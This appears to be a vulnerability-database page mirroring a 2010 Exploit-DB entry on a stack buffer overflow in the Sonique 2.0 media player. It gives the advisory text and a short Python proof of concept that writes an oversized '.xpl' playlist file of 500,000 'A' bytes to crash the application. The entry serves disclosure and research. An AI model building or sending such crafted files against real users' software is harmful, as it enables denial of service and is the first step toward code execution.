Lucene search
K

Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow

🗓️ 12 Aug 2010 00:00:00Reported by Hamza_hack_dz & Black-liondz1Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 15 Views

Remote stack buffer overflow in Sonique 2.

Code
source: https://www.securityfocus.com/bid/42434/info

Sonique is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Sonique 2.0 Beta Build 103 is vulnerable; other versions may also be affected. 

#Date: 12/8/2010                                                                            
#Author:Hamza_hack_dz & Black-liondz1                                                      
#Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html #                                                                          #
#Version:sonique2                                                                           
# web:www.sa-hacker.com/vb
# Email:[email protected] &[email protected]                                           

                        
#!/user/bin/python

filename = "sa-hacker.xpl"

junk = "\x41" * 500000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()


# Inj3ct0r.com [2010-08-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation